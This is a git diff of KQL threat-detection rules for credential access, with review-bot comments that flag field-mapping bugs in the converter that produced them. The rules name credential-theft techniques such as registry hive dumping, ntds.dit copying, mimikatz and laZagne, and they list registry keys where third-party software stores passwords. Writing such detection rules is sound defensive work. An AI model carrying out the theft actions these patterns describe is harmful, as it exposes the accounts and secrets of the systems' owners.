+// Title: Copy .DMP/.DUMP Files From Remote Share Via Cmd.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-09-27
+// Level: high
+// Description: Detects usage of the copy builtin cmd command to copy files with the ".dmp"/".dump" extension from a remote share
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access
+
+DeviceProcessEvents
 | where ((ProcessCommandLine contains ".dmp" or ProcessCommandLine contains ".dump" or ProcessCommandLine contains ".hdmp") and (ProcessCommandLine contains "copy " and ProcessCommandLine contains " \\\\")) and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe")
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/copy_passwd_or_shadow_from_tmp_path.kql b/KQL/rules/Credential Access/copy_passwd_or_shadow_from_tmp_path.kql
index 0a42abf5..8bd804dd 100644
--- a/KQL/rules/Credential Access/copy_passwd_or_shadow_from_tmp_path.kql
+++ b/KQL/rules/Credential Access/copy_passwd_or_shadow_from_tmp_path.kql
@@ -1,10 +1,10 @@
-// Title: Copy Passwd Or Shadow From TMP Path
-// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
-// Date: 2023-01-31
-// Level: high
-// Description: Detects when the file "passwd" or "shadow" is copied from tmp path
-// MITRE Tactic: Credential Access
-// Tags: attack.credential-access, attack.t1552.001
-
-DeviceProcessEvents
+// Title: Copy Passwd Or Shadow From TMP Path
+// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
+// Date: 2023-01-31
+// Level: high
+// Description: Detects when the file "passwd" or "shadow" is copied from tmp path
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1552.001
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "passwd" or ProcessCommandLine contains "shadow") and FolderPath endswith "/cp" and ProcessCommandLine contains "/tmp/"
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/copying_sensitive_files_with_credential_data.kql b/KQL/rules/Credential Access/copying_sensitive_files_with_credential_data.kql
index b8d224e8..f537d536 100644
--- a/KQL/rules/Credential Access/copying_sensitive_files_with_credential_data.kql
+++ b/KQL/rules/Credential Access/copying_sensitive_files_with_credential_data.kql
@@ -1,12 +1,12 @@
-// Title: Copying Sensitive Files with Credential Data
-// Author: Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community
-// Date: 2019-10-22
-// Level: high
-// Description: Files with well-known filenames (sensitive files with credential data) copying
-// MITRE Tactic: Credential Access
-// Tags: attack.credential-access, attack.t1003.002, attack.t1003.003, car.2013-07-001, attack.s0404
-// False Positives:
-// - Copying sensitive files for legitimate use (eg. backup) or forensic investigation by legitimate incident responder or forensic investigator.
-
-DeviceProcessEvents
+// Title: Copying Sensitive Files with Credential Data
+// Author: Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community
+// Date: 2019-10-22
+// Level: high
+// Description: Files with well-known filenames (sensitive files with credential data) copying
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.002, attack.t1003.003, car.2013-07-001, attack.s0404
+// False Positives:
+// - Copying sensitive files for legitimate use (eg. backup) or forensic investigation by legitimate incident responder or forensic investigator.
+
+DeviceProcessEvents
 | where ((ProcessCommandLine contains "vss" or ProcessCommandLine contains " -m " or ProcessCommandLine contains " /m " or ProcessCommandLine contains " –m " or ProcessCommandLine contains " —m " or ProcessCommandLine contains " ―m " or ProcessCommandLine contains " -y " or ProcessCommandLine contains " /y " or ProcessCommandLine contains " –y " or ProcessCommandLine contains " —y " or ProcessCommandLine contains " ―y ") and (FolderPath endswith "\\esentutl.exe" or ProcessVersionInfoOriginalFileName =~ "\\esentutl.exe")) or (ProcessCommandLine contains "\\config\\RegBack\\sam" or ProcessCommandLine contains "\\config\\RegBack\\security" or ProcessCommandLine contains "\\config\\RegBack\\system" or ProcessCommandLine contains "\\config\\sam" or ProcessCommandLine contains "\\config\\security" or ProcessCommandLine contains "\\config\\system " or ProcessCommandLine contains "\\repair\\sam" or ProcessCommandLine contains "\\repair\\security" or ProcessCommandLine contains "\\repair\\system" or ProcessCommandLine contains "\\windows\\ntds\\ntds.dit")
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/cred_dump_tools_dropped_files.kql b/KQL/rules/Credential Access/cred_dump_tools_dropped_files.kql
index 15a616e2..ea5eca48 100644
--- a/KQL/rules/Credential Access/cred_dump_tools_dropped_files.kql
+++ b/KQL/rules/Credential Access/cred_dump_tools_dropped_files.kql
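Review bot: The term `ProcessVersionInfoOriginalFileName =~ "\\esentutl.exe"` in the `| where` line (unchanged context in this hunk, but the rule's effective logic) can never match, because OriginalFileName is the bare name from the PE version resource and never carries a path separator; the esentutl branch therefore only fires on the FolderPath clause and a renamed copy of esentutl.exe is missed. Change it to `ProcessVersionInfoOriginalFileName =~ "esentutl.exe"`, which is how the cmd.exe and reg.exe rules elsewhere in this patch compare OriginalFileName. The stray leading backslash looks like a converter artefact, so the generator is worth checking for the same pattern in other emitted rules.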
@@ -1,12 +1,12 @@
-// Title: Cred Dump Tools Dropped Files
-// Author: Teymur Kheirkhabarov, oscd.community
-// Date: 2019-11-01
-// Level: high
-// Description: Files with well-known filenames (parts of credential dump software or files produced by them) creation
-// MITRE Tactic: Credential Access
-// Tags: attack.credential-access, attack.t1003.001, attack.t1003.002, attack.t1003.003, attack.t1003.004, attack.t1003.005
-// False Positives:
-// - Legitimate Administrator using tool for password recovery
-
-DeviceFileEvents
+// Title: Cred Dump Tools Dropped Files
+// Author: Teymur Kheirkhabarov, oscd.community
+// Date: 2019-11-01
+// Level: high
+// Description: Files with well-known filenames (parts of credential dump software or files produced by them) creation
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.001, attack.t1003.002, attack.t1003.003, attack.t1003.004, attack.t1003.005
+// False Positives:
+// - Legitimate Administrator using tool for password recovery
+
+DeviceFileEvents
 | where (FolderPath contains "\\fgdump-log" or FolderPath contains "\\kirbi" or FolderPath contains "\\pwdump" or FolderPath contains "\\pwhashes" or FolderPath contains "\\wce_ccache" or FolderPath contains "\\wce_krbtkts") or (FolderPath endswith "\\cachedump.exe" or FolderPath endswith "\\cachedump64.exe" or FolderPath endswith "\\DumpExt.dll" or FolderPath endswith "\\DumpSvc.exe" or FolderPath endswith "\\Dumpy.exe" or FolderPath endswith "\\fgexec.exe" or FolderPath endswith "\\lsremora.dll" or FolderPath endswith "\\lsremora64.dll" or FolderPath endswith "\\NTDS.out" or FolderPath endswith "\\procdump64.exe" or FolderPath endswith "\\pstgdump.exe" or FolderPath endswith "\\pwdump.exe" or FolderPath endswith "\\SAM.out" or FolderPath endswith "\\SECURITY.out" or FolderPath endswith "\\servpw.exe" or FolderPath endswith "\\servpw64.exe" or FolderPath endswith "\\SYSTEM.out" or FolderPath endswith "\\test.pwd" or FolderPath endswith "\\wceaux.dll")
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/credential_manager_access_by_uncommon_applications.kql b/KQL/rules/Credential Access/credential_manager_access_by_uncommon_applications.kql
index 42a3ab11..198e3fad 100644
--- a/KQL/rules/Credential Access/credential_manager_access_by_uncommon_applications.kql
+++ b/KQL/rules/Credential Access/credential_manager_access_by_uncommon_applications.kql
@@ -1,13 +1,13 @@
-// Title: Credential Manager Access By Uncommon Applications
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-10-11
-// Level: medium
-// Description: Detects suspicious processes based on name and location that access the windows credential manager and vault.
-// Which can be a sign of credential stealing. Example case would be usage of mimikatz "dpapi::cred" function
-// MITRE Tactic: Credential Access
-// Tags: attack.t1003, attack.credential-access
-// False Positives:
-// - Legitimate software installed by the users for example in the "AppData" directory may access these files (for any reason).
-
-DeviceFileEvents
+// Title: Credential Manager Access By Uncommon Applications
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-10-11
+// Level: medium
+// Description: Detects suspicious processes based on name and location that access the windows credential manager and vault.
+// Which can be a sign of credential stealing. Example case would be usage of mimikatz "dpapi::cred" function
+// MITRE Tactic: Credential Access
+// Tags: attack.t1003, attack.credential-access
+// False Positives:
+// - Legitimate software installed by the users for example in the "AppData" directory may access these files (for any reason).
+
+DeviceFileEvents
 | where (FileName contains "\\AppData\\Local\\Microsoft\\Credentials\\" or FileName contains "\\AppData\\Roaming\\Microsoft\\Credentials\\" or FileName contains "\\AppData\\Local\\Microsoft\\Vault\\" or FileName contains "\\ProgramData\\Microsoft\\Vault\\") and (not((InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\system32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\")))
\ No newline at end of file
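Review bot: The four `FileName contains "\\AppData\\...\\"` terms in the `| where` line cannot match in DeviceFileEvents, where FileName holds only the file's name and the directory is in FolderPath, so this credential-manager rule is silently dead even though the hunk leaves it untouched. The other DeviceFileEvents rules in this patch (e.g. cred_dump_tools_dropped_files) already match directory fragments on FolderPath; do the same here, e.g. `FolderPath contains "\\AppData\\Local\\Microsoft\\Credentials\\" or FolderPath contains "\\AppData\\Roaming\\Microsoft\\Credentials\\" or FolderPath contains "\\AppData\\Local\\Microsoft\\Vault\\" or FolderPath contains "\\ProgramData\\Microsoft\\Vault\\"`. This looks like a field-mapping bug in the converter (Sigma TargetFilename → FileName instead of FolderPath), so other file rules should be checked for the same mapping.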
diff --git a/KQL/rules/Credential Access/credentials_from_password_stores_keychain.kql b/KQL/rules/Credential Access/credentials_from_password_stores_keychain.kql
index cce1fca6..cb3815a2 100644
--- a/KQL/rules/Credential Access/credentials_from_password_stores_keychain.kql
+++ b/KQL/rules/Credential Access/credentials_from_password_stores_keychain.kql
@@ -1,12 +1,12 @@
-// Title: Credentials from Password Stores - Keychain
-// Author: Tim Ismilyaev, oscd.community, Florian Roth (Nextron Systems)
-// Date: 2020-10-19
-// Level: medium
-// Description: Detects passwords dumps from Keychain
-// MITRE Tactic: Credential Access
-// Tags: attack.credential-access, attack.t1555.001
-// False Positives:
-// - Legitimate administration activities
-
-DeviceProcessEvents
+// Title: Credentials from Password Stores - Keychain
+// Author: Tim Ismilyaev, oscd.community, Florian Roth (Nextron Systems)
+// Date: 2020-10-19
+// Level: medium
+// Description: Detects passwords dumps from Keychain
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1555.001
+// False Positives:
+// - Legitimate administration activities
+
+DeviceProcessEvents
 | where ((ProcessCommandLine contains "find-certificate" or ProcessCommandLine contains " export ") and FolderPath =~ "/usr/bin/security") or (ProcessCommandLine contains " dump-keychain " or ProcessCommandLine contains " login-keychain ")
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/credentials_in_files.kql b/KQL/rules/Credential Access/credentials_in_files.kql
index 1ac52bd4..35401654 100644
--- a/KQL/rules/Credential Access/credentials_in_files.kql
+++ b/KQL/rules/Credential Access/credentials_in_files.kql
@@ -1,10 +1,10 @@
-// Title: Credentials In Files
-// Author: Igor Fits, Mikhail Larin, oscd.community
-// Date: 2020-10-19
-// Level: high
-// Description: Detecting attempts to extract passwords with grep and laZagne
-// MITRE Tactic: Credential Access
-// Tags: attack.credential-access, attack.t1552.001
-
-DeviceProcessEvents
+// Title: Credentials In Files
+// Author: Igor Fits, Mikhail Larin, oscd.community
+// Date: 2020-10-19
+// Level: high
+// Description: Detecting attempts to extract passwords with grep and laZagne
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1552.001
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "password" and FolderPath endswith "/grep") or ProcessCommandLine contains "laZagne"
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/credui_dll_loaded_by_uncommon_process.kql b/KQL/rules/Credential Access/credui_dll_loaded_by_uncommon_process.kql
index 657873d6..dc4b3d89 100644
--- a/KQL/rules/Credential Access/credui_dll_loaded_by_uncommon_process.kql
+++ b/KQL/rules/Credential Access/credui_dll_loaded_by_uncommon_process.kql
@@ -1,12 +1,12 @@
-// Title: CredUI.DLL Loaded By Uncommon Process
-// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
-// Date: 2020-10-20
-// Level: medium
-// Description: Detects loading of "credui.dll" and related DLLs by an uncommon process. Attackers might leverage this DLL for potential use of "CredUIPromptForCredentials" or "CredUnPackAuthenticationBufferW".
-// MITRE Tactic: Credential Access
-// Tags: attack.credential-access, attack.collection, attack.t1056.002
-// False Positives:
-// - Other legitimate processes loading those DLLs in your environment.
-
-DeviceImageLoadEvents
+// Title: CredUI.DLL Loaded By Uncommon Process
+// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
+// Date: 2020-10-20
+// Level: medium
+// Description: Detects loading of "credui.dll" and related DLLs by an uncommon process. Attackers might leverage this DLL for potential use of "CredUIPromptForCredentials" or "CredUnPackAuthenticationBufferW".
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.collection, attack.t1056.002
+// False Positives:
+// - Other legitimate processes loading those DLLs in your environment.
+
+DeviceImageLoadEvents
 | where ((FolderPath endswith "\\credui.dll" or FolderPath endswith "\\wincredui.dll") or (InitiatingProcessVersionInfoOriginalFileName in~ ("credui.dll", "wincredui.dll"))) and (not(((InitiatingProcessFolderPath in~ ("C:\\Windows\\explorer.exe", "C:\\Windows\\ImmersiveControlPanel\\SystemSettings.exe", "C:\\Windows\\regedit.exe")) or (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\")))) and (not(((InitiatingProcessFolderPath contains "\\AppData\\Local\\Microsoft\\OneDrive\\" and InitiatingProcessFolderPath startswith "C:\\Users\\") or InitiatingProcessFolderPath endswith "\\opera_autoupdate.exe" or (InitiatingProcessFolderPath endswith "\\procexp64.exe" or InitiatingProcessFolderPath endswith "\\procexp.exe") or (InitiatingProcessFolderPath contains "\\AppData\\Local\\Microsoft\\Teams\\" and InitiatingProcessFolderPath endswith "\\Teams.exe" and InitiatingProcessFolderPath startswith "C:\\Users\\"))))
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/dpapi_backup_keys_and_certificate_export_activity_ioc.kql b/KQL/rules/Credential Access/dpapi_backup_keys_and_certificate_export_activity_ioc.kql
index 886fe412..b8db3552 100644
--- a/KQL/rules/Credential Access/dpapi_backup_keys_and_certificate_export_activity_ioc.kql
+++ b/KQL/rules/Credential Access/dpapi_backup_keys_and_certificate_export_activity_ioc.kql
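Review bot: The term `InitiatingProcessVersionInfoOriginalFileName in~ ("credui.dll", "wincredui.dll")` in the `| where` line describes the loading process rather than the loaded image, so it is never true for a real process and adds nothing; the Sigma OriginalFileName there refers to the DLL being loaded, and DeviceImageLoadEvents has no original-file-name column for the loaded image that the converter could have used. Drop that alternative and keep only `(FolderPath endswith "\\credui.dll" or FolderPath endswith "\\wincredui.dll")` as the image selection, or at least flag in the header comment that the OriginalFileName part of the upstream rule could not be translated. Presumably this is a generic mapping rule in the converter, so other image-load rules are likely affected the same way.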
@@ -1,12 +1,12 @@
-// Title: DPAPI Backup Keys And Certificate Export Activity IOC
-// Author: Nounou Mbeiri, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2024-06-26
-// Level: high
-// Description: Detects file names with specific patterns seen generated and used by tools such as Mimikatz and DSInternals related to exported or stolen DPAPI backup keys and certificates.
-// MITRE Tactic: Credential Access
-// Tags: attack.credential-access, attack.t1555, attack.t1552.004
-// False Positives:
-// - Unlikely
-
-DeviceFileEvents
+// Title: DPAPI Backup Keys And Certificate Export Activity IOC
+// Author: Nounou Mbeiri, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2024-06-26
+// Level: high
+// Description: Detects file names with specific patterns seen generated and used by tools such as Mimikatz and DSInternals related to exported or stolen DPAPI backup keys and certificates.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1555, attack.t1552.004
+// False Positives:
+// - Unlikely
+
+DeviceFileEvents
 | where (FolderPath contains "ntds_capi_" or FolderPath contains "ntds_legacy_" or FolderPath contains "ntds_unknown_") and (FolderPath endswith ".cer" or FolderPath endswith ".key" or FolderPath endswith ".pfx" or FolderPath endswith ".pvk")
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/dumping_of_sensitive_hives_via_reg_exe.kql b/KQL/rules/Credential Access/dumping_of_sensitive_hives_via_reg_exe.kql
index 30d6ab69..abbf891a 100644
--- a/KQL/rules/Credential Access/dumping_of_sensitive_hives_via_reg_exe.kql
+++ b/KQL/rules/Credential Access/dumping_of_sensitive_hives_via_reg_exe.kql
@@ -1,12 +1,12 @@
-// Title: Dumping of Sensitive Hives Via Reg.EXE
-// Author: Teymur Kheirkhabarov, Endgame, JHasenbusch, Daniil Yugoslavskiy, oscd.community, frack113
-// Date: 2019-10-22
-// Level: high
-// Description: Detects the usage of "reg.exe" in order to dump sensitive registry hives. This includes SAM, SYSTEM and SECURITY hives.
-// MITRE Tactic: Credential Access
-// Tags: attack.credential-access, attack.t1003.002, attack.t1003.004, attack.t1003.005, car.2013-07-001
-// False Positives:
-// - Dumping hives for legitimate purpouse i.e. backup or forensic investigation
-
-DeviceProcessEvents
+// Title: Dumping of Sensitive Hives Via Reg.EXE
+// Author: Teymur Kheirkhabarov, Endgame, JHasenbusch, Daniil Yugoslavskiy, oscd.community, frack113
+// Date: 2019-10-22
+// Level: high
+// Description: Detects the usage of "reg.exe" in order to dump sensitive registry hives. This includes SAM, SYSTEM and SECURITY hives.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.002, attack.t1003.004, attack.t1003.005, car.2013-07-001
+// False Positives:
+// - Dumping hives for legitimate purpouse i.e. backup or forensic investigation
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains " save " or ProcessCommandLine contains " export " or ProcessCommandLine contains " ˢave " or ProcessCommandLine contains " eˣport ") and (ProcessCommandLine contains "\\system" or ProcessCommandLine contains "\\sam" or ProcessCommandLine contains "\\security" or ProcessCommandLine contains "\\ˢystem" or ProcessCommandLine contains "\\syˢtem" or ProcessCommandLine contains "\\ˢyˢtem" or ProcessCommandLine contains "\\ˢam" or ProcessCommandLine contains "\\ˢecurity") and (ProcessCommandLine contains "hklm" or ProcessCommandLine contains "hk˪m" or ProcessCommandLine contains "hkey_local_machine" or ProcessCommandLine contains "hkey_˪ocal_machine" or ProcessCommandLine contains "hkey_loca˪_machine" or ProcessCommandLine contains "hkey_˪oca˪_machine") and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe")
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/dumping_process_via_sqldumper_exe.kql b/KQL/rules/Credential Access/dumping_process_via_sqldumper_exe.kql
index 0f646b54..52766419 100644
--- a/KQL/rules/Credential Access/dumping_process_via_sqldumper_exe.kql
+++ b/KQL/rules/Credential Access/dumping_process_via_sqldumper_exe.kql
@@ -1,12 +1,12 @@
-// Title: Dumping Process via Sqldumper.exe
-// Author: Kirill Kiryanov, oscd.community
-// Date: 2020-10-08
-// Level: medium
-// Description: Detects process dump via legitimate sqldumper.exe binary
-// MITRE Tactic: Credential Access
-// Tags: attack.credential-access, attack.t1003.001
-// False Positives:
-// - Legitimate MSSQL Server actions
-
-DeviceProcessEvents
+// Title: Dumping Process via Sqldumper.exe
+// Author: Kirill Kiryanov, oscd.community
+// Date: 2020-10-08
+// Level: medium
+// Description: Detects process dump via legitimate sqldumper.exe binary
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.001
+// False Positives:
+// - Legitimate MSSQL Server actions
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "0x0110" or ProcessCommandLine contains "0x01100:40") and FolderPath endswith "\\sqldumper.exe"
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/enumeration_for_3rd_party_creds_from_cli.kql b/KQL/rules/Credential Access/enumeration_for_3rd_party_creds_from_cli.kql
index ee03e1f5..35b453b9 100644
--- a/KQL/rules/Credential Access/enumeration_for_3rd_party_creds_from_cli.kql
+++ b/KQL/rules/Credential Access/enumeration_for_3rd_party_creds_from_cli.kql
@@ -1,10 +1,10 @@
-// Title: Enumeration for 3rd Party Creds From CLI
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-06-20
-// Level: medium
-// Description: Detects processes that query known 3rd party registry keys that holds credentials via commandline
-// MITRE Tactic: Credential Access
-// Tags: attack.credential-access, attack.t1552.002
-
-DeviceProcessEvents
+// Title: Enumeration for 3rd Party Creds From CLI
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-06-20
+// Level: medium
+// Description: Detects processes that query known 3rd party registry keys that holds credentials via commandline
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1552.002
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "\\Software\\Aerofox\\Foxmail\\V3.1" or ProcessCommandLine contains "\\Software\\Aerofox\\FoxmailPreview" or ProcessCommandLine contains "\\Software\\DownloadManager\\Passwords" or ProcessCommandLine contains "\\Software\\FTPWare\\COREFTP\\Sites" or ProcessCommandLine contains "\\Software\\IncrediMail\\Identities" or ProcessCommandLine contains "\\Software\\Martin Prikryl\\WinSCP 2\\Sessions" or ProcessCommandLine contains "\\Software\\Mobatek\\MobaXterm\\" or ProcessCommandLine contains "\\Software\\OpenSSH\\Agent\\Keys" or ProcessCommandLine contains "\\Software\\OpenVPN-GUI\\configs" or ProcessCommandLine contains "\\Software\\ORL\\WinVNC3\\Password" or ProcessCommandLine contains "\\Software\\Qualcomm\\Eudora\\CommandLine" or ProcessCommandLine contains "\\Software\\RealVNC\\WinVNC4" or ProcessCommandLine contains "\\Software\\RimArts\\B2\\Settings" or ProcessCommandLine contains "\\Software\\SimonTatham\\PuTTY\\Sessions" or ProcessCommandLine contains "\\Software\\SimonTatham\\PuTTY\\SshHostKeys\\" or ProcessCommandLine contains "\\Software\\Sota\\FFFTP" or ProcessCommandLine contains "\\Software\\TightVNC\\Server" or ProcessCommandLine contains "\\Software\\WOW6432Node\\Radmin\\v3.0\\Server\\Parameters\\Radmin") and (not(((ProcessCommandLine contains "export" or ProcessCommandLine contains "save") and FolderPath endswith "reg.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/enumeration_for_credentials_in_registry.kql b/KQL/rules/Credential Access/enumeration_for_credentials_in_registry.kql
index f5d364c4..50aa7bd6 100644
--- a/KQL/rules/Credential Access/enumeration_for_credentials_in_registry.kql
+++ b/KQL/rules/Credential Access/enumeration_for_credentials_in_registry.kql
@@ -1,12 +1,12 @@
-// Title: Enumeration for Credentials in Registry
-// Author: frack113
-// Date: 2021-12-20
-// Level: medium
-// Description: Adversaries may search the Registry on compromised systems for insecurely stored credentials.
-// The Windows Registry stores configuration information that can be used by the system or other programs.
-// Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services
-// MITRE Tactic: Credential Access
-// Tags: attack.credential-access, attack.t1552.002
-
-DeviceProcessEvents
+// Title: Enumeration for Credentials in Registry
+// Author: frack113
+// Date: 2021-12-20
+// Level: medium
+// Description: Adversaries may search the Registry on compromised systems for insecurely stored credentials.
+// The Windows Registry stores configuration information that can be used by the system or other programs.
+// Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1552.002
+
+DeviceProcessEvents
 | where ((ProcessCommandLine contains " query " and ProcessCommandLine contains "/t " and ProcessCommandLine contains "REG_SZ" and ProcessCommandLine contains "/s") and FolderPath endswith "\\reg.exe") and ((ProcessCommandLine contains "/f " and ProcessCommandLine contains "HKLM") or (ProcessCommandLine contains "/f " and ProcessCommandLine contains "HKCU") or ProcessCommandLine contains "HKCU\\Software\\SimonTatham\\PuTTY\\Sessions")
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/esentutl_gather_credentials.kql b/KQL/rules/Credential Access/esentutl_gather_credentials.kql
index 2acd3ec5..109dcafe 100644
--- a/KQL/rules/Credential Access/esentutl_gather_credentials.kql
+++ b/KQL/rules/Credential Access/esentutl_gather_credentials.kql
@@ -1,12 +1,12 @@
-// Title: Esentutl Gather Credentials
-// Author: sam0x90
-// Date: 2021-08-06
-// Level: medium
-// Description: Conti recommendation to its affiliates to use esentutl to access NTDS dumped file. Trickbot also uses this utilities to get MSEdge info via its module pwgrab.
-// MITRE Tactic: Credential Access
-// Tags: attack.credential-access, attack.t1003, attack.t1003.003, attack.s0404
-// False Positives:
-// - To be determined
-
-DeviceProcessEvents
+// Title: Esentutl Gather Credentials
+// Author: sam0x90
+// Date: 2021-08-06
+// Level: medium
+// Description: Conti recommendation to its affiliates to use esentutl to access NTDS dumped file. Trickbot also uses this utilities to get MSEdge info via its module pwgrab.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003, attack.t1003.003, attack.s0404
+// False Positives:
+// - To be determined
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "esentutl" and ProcessCommandLine contains " /p"
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/esentutl_volume_shadow_copy_service_keys.kql b/KQL/rules/Credential Access/esentutl_volume_shadow_copy_service_keys.kql
index 42aee421..46e5d83f 100644
--- a/KQL/rules/Credential Access/esentutl_volume_shadow_copy_service_keys.kql
+++ b/KQL/rules/Credential Access/esentutl_volume_shadow_copy_service_keys.kql
@@ -1,10 +1,10 @@
-// Title: Esentutl Volume Shadow Copy Service Keys
-// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
-// Date: 2020-10-20
-// Level: high
-// Description: Detects the volume shadow copy service initialization and processing via esentutl. Registry keys such as HKLM\\System\\CurrentControlSet\\Services\\VSS\\Diag\\VolSnap\\Volume are captured.
-// MITRE Tactic: Credential Access
-// Tags: attack.credential-access, attack.t1003.002
-
-DeviceRegistryEvents
+// Title: Esentutl Volume Shadow Copy Service Keys
+// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
+// Date: 2020-10-20
+// Level: high
+// Description: Detects the volume shadow copy service initialization and processing via esentutl. Registry keys such as HKLM\\System\\CurrentControlSet\\Services\\VSS\\Diag\\VolSnap\\Volume are captured.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.002
+
+DeviceRegistryEvents
 | where (InitiatingProcessFolderPath endswith "esentutl.exe" and RegistryKey contains "System\\CurrentControlSet\\Services\\VSS") and (not(RegistryKey contains "System\\CurrentControlSet\\Services\\VSS\\Start"))
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/file_access_of_signal_desktop_sensitive_data.kql b/KQL/rules/Credential Access/file_access_of_signal_desktop_sensitive_data.kql
index e7d9fa9d..622f8b7a 100644
--- a/KQL/rules/Credential Access/file_access_of_signal_desktop_sensitive_data.kql
+++ b/KQL/rules/Credential Access/file_access_of_signal_desktop_sensitive_data.kql
@@ -1,15 +1,15 @@
-// Title: File Access Of Signal Desktop Sensitive Data
-// Author: Andreas Braathen (mnemonic.io)
-// Date: 2025-10-19
-// Level: medium
-// Description: Detects access to Signal Desktop's sensitive data files: db.sqlite and config.json.
-// The db.sqlite file in Signal Desktop stores all locally saved messages in an encrypted SQLite database, while the config.json contains the decryption key needed to access that data.
-// Since the key is stored in plain text, a threat actor who gains access to both files can decrypt and read sensitive messages without needing the users credentials.
-// Currently the rule only covers the default Signal installation path in AppData\Roaming. Signal Portable installations may use different paths based on user configuration. Additional paths can be added to the selection as needed.
-// MITRE Tactic: Credential Access
-// Tags: attack.credential-access, attack.t1003
-// False Positives:
-// - Unlikely, but possible from AV or backup software accessing the files.
-
-DeviceRegistryEvents
+// Title: File Access Of Signal Desktop Sensitive Data
+// Author: Andreas Braathen (mnemonic.io)
+// Date: 2025-10-19
+// Level: medium
+// Description: Detects access to Signal Desktop's sensitive data files: db.sqlite and config.json.
+// The db.sqlite file in Signal Desktop stores all locally saved messages in an encrypted SQLite database, while the config.json contains the decryption key needed to access that data.
+// Since the key is stored in plain text, a threat actor who gains access to both files can decrypt and read sensitive messages without needing the users credentials.
+// Currently the rule only covers the default Signal installation path in AppData\Roaming. Signal Portable installations may use different paths based on user configuration. Additional paths can be added to the selection as needed.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003
+// False Positives:
+// - Unlikely, but possible from AV or backup software accessing the files.
+
+DeviceRegistryEvents
 | where (RegistryKey endswith "\\AppData\\Roaming\\Signal*" and (RegistryKey endswith "\\config.json" or RegistryKey endswith "\\db.sqlite")) and (not((InitiatingProcessFolderPath endswith "\\signal-portable.exe" or InitiatingProcessFolderPath endswith "\\signal.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/findstr_gpp_passwords.kql b/KQL/rules/Credential Access/findstr_gpp_passwords.kql
index 2f0fe3c9..1e6dc976 100644
--- a/KQL/rules/Credential Access/findstr_gpp_passwords.kql
+++ b/KQL/rules/Credential Access/findstr_gpp_passwords.kql
@@ -1,10 +1,10 @@
-// Title: Findstr GPP Passwords
-// Author: frack113
-// Date: 2021-12-27
-// Level: high
-// Description: Look for the encrypted cpassword value within Group Policy Preference files on the Domain Controller. This value can be decrypted with gpp-decrypt.
-// MITRE Tactic: Credential Access
-// Tags: attack.credential-access, attack.t1552.006
-
-DeviceProcessEvents
+// Title: Findstr GPP Passwords
+// Author: frack113
+// Date: 2021-12-27
+// Level: high
+// Description: Look for the encrypted cpassword value within Group Policy Preference files on the Domain Controller. This value can be decrypted with gpp-decrypt.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1552.006
+
+DeviceProcessEvents
